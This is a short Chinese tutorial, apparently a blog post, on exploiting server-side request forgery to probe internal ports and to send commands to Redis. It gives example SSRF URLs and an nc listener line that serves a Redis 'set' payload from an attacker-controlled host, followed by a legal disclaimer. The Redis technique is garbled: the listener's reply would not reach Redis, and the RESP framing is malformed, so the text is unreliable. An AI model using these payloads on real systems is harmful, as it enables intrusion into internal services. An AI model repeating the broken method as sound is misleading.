ssrf漏洞利用(内网探测、打redis)
SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种安全漏洞,攻击者通过引诱服务器发起请求到内部系统或服务。以下是利用SSRF漏洞进行内网探测和操作Redis的示例:
- 内网探测:
如果目标SSRF漏洞允许攻击者指定URL,可以尝试请求内网服务的特定端口来探测内网信息。例如,可以尝试访问一些通常在内网开放的服务如SMB、RDP、SSH等:
http://vulnerable-site.com/api?url=http://internal-service:port
- 打Redis:
如果Redis暴露在外部无需验证即可访问,或者SSRF可以用来发起对Redis的请求,可以尝试执行Redis命令。以下是一个利用SSRF漏洞执行Redis写入操作的例子:
http://vulnerable-site.com/api?url=http://attacker-controlled-host:port%2F
在attacker-controlled-host
上,运行一个监听port
的服务,并在其响应中包含Redis写入命令:
echo -e "*\r\n\$4\r\nset\r\n\$4\r\ntest\r\n\$3\r\n123\r\n" | nc -l -p port
当请求达到目标服务器并被处理时,会发送一个Redis写入命令到监听的端口,写入test:123
到Redis。
请注意,实际操作时应确保合法地使用SSRF漏洞,并遵守相关法律法规。上述操作只是为了演示如何利用SSRF漏洞,不推荐未经授权对任何系统执行类似操作。
评论已关闭